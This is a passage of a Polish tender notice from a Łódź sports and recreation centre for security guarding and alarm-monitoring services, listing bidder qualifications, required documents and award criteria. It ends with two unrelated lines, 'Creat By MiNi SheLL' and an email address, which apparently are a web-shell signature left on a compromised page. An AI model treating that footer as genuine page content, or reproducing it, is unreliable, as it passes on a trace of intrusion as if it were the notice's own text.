Wykonawca musi udokumentować, że w ciągu ostatnich 3 lat kalendarzowych (poprzedzających dzień złożenia oferty), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał, co najmniej jedną (1) główną usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. związaną z ochroną mienia, a wartość kontraktu w okresie nie dłuższym niż 12 miesięcy jest nie mniejsza niż 150.000 zł brutto.
Część 2
Wykonawca musi udokumentować, że w ciągu ostatnich 3 lat kalendarzowych (poprzedzających dzień złożenia oferty), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał, co najmniej jedną (1) główną usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. związaną z ochroną mienia, a wartość kontraktu w okresie nie dłuższym niż 12 miesięcy jest nie mniejsza niż 150.000 zł brutto.
Część 3
Wykonawca musi udokumentować, że w ciągu ostatnich 3 lat kalendarzowych (poprzedzających dzień złożenia oferty), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał, co najmniej jedną (1) główną usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. związaną z ochroną mienia poprzez stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1
Wykonawca musi wykazać, że dysponuje:
a)	minimum 3 samochodami (wyposażenie grup interwencyjnych) w tym samym czasie na terenie miasta Łodzi wyposażonymi w system GPS; 
b)	minimum 10 sztukami telefonów komórkowych lub radiotelefonów przenośnych zapewniających łączność z bazą Wykonawcy (wyposażenie obsługi pracowników ochrony);
c)	minimum 20 sztukami wymuszaczy obchodu (do zamontowania na ochranianych obiektach);
Część 2
Wykonawca musi wykazać, że dysponuje:
a)	minimum 3 samochodami (wyposażenie grup interwencyjnych) w tym samym czasie na terenie miasta Łodzi wyposażonymi w system GPS; 
b)	minimum 7 zestawami słuchawkowymi (wyposażenie łączności kwalifikowanych pracowników ochrony)
Część 3
Wykonawca musi wykazać, że dysponuje:
a)	minimum 3 samochodami (wyposażenie grup interwencyjnych) w tym samym czasie na terenie miasta Łodzi wyposażonymi w system GPS; 
b)	monitoringiem dwutorowym działającym radiowo i GSM lub na sztywno (do łączności z ochranianymi obiektami które należy wyposażyć w nadajniki GSM).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1
Wykonawca musi wykazać, że dysponuje osobami:
a)	w ilości minimum 20 osób (pracownicy ochrony niewymagający wpisu na listę kwalifikowanych pracowników) posiadającymi przeszkolenie w zakresie ppoż., bhp, udzielanie pierwszej pomocy, dozoru obiektów - minimum dwuletni staż pracy na danym stanowisku,
b)	w ilości minimum 2 osób (szefowie ochrony - pracownicy ochrony wpisani na listę kwalifikowanych pracowników ochrony), posiadającymi wyższe wykształcenie - minimum pięcioletni staż pracy na danym stanowisku,
c)	w ilości minimum 3 grup interwencyjnych, (pracownicy ochrony wpisani na listę kwalifikowanych pracowników ochrony), posiadającymi minimum pięcioletni staż pracy na danym stanowisku,
Część 2
Wykonawca musi wykazać, że dysponuje osobami:
a)	w ilości minimum 7 osób (pracownicy ochrony wpisani na listę kwalifikowanych pracowników ochrony) posiadającymi przeszkolenie w zakresie ppoż., bhp, udzielanie pierwszej pomocy, posiadającymi minimum średnie wykształcenie - minimum pięcioletni staż pracy na danym stanowisku,
a)	w ilości minimum 2 osób (szefowie ochrony - pracownicy ochrony wpisani na listę kwalifikowanych pracowników ochrony), posiadającymi wyższe wykształcenie - minimum pięcioletni staż pracy na danym stanowisku,
b)	w ilości minimum 3 grup interwencyjnych, (pracownicy ochrony wpisani na listę kwalifikowanych pracowników ochrony), posiadającymi minimum pięcioletni staż pracy na danym stanowisku,
Wykonawca zobowiązany jest przed podpisaniem umowy, przedłożyć Zamawiającemu zaświadczenie właściwego Komendanta Wojewódzkiego Policji o dokonaniu wpisu na listę kwalifikowanych pracowników ochrony fizycznej dotyczących siedmiu osób, o których mowa powyżej, które będą uczestniczyć w realizacji zamówienia.
Część 3
Wykonawca musi wykazać, że dysponuje osobami:
a)	w ilości minimum 2 osób (szefowie ochrony - pracownicy ochrony wpisani na listę kwalifikowanych pracowników ochrony), posiadającymi wyższe wykształcenie - minimum pięcioletni staż pracy na danym stanowisku,
b)	w ilości minimum 3 grup interwencyjnych, (pracownicy ochrony wpisani na listę kwalifikowanych pracowników ochrony), posiadającymi minimum pięcioletni staż pracy na danym stanowisku,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie Wykonawcy w zakresie ochrony fizycznej - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Łodzi
90-532 Łódź, ul. ks. Skorupki 21
Dział ogólny pokój 256.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2014 godzina 09:55, miejsce: Miejski Ośrodek Sportu i Rekreacji w Łodzi
90-532 Łódź, ul. ks. Skorupki 21
Sekretariat pokój 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ochrona fizyczna osób i mienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. doświadczenie Wykonawcy w zakresie ochrony fizycznej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ochrona fizyczna osób i mienia przez pracowników kwalifikowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. doświadczenie Wykonawcy w zakresie ochrony fizycznej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dzierżawa systemu ochrony mienia i monitorowanie sygnałów alarmowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie Wykonawcy w zakresie ochrony fizycznej - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com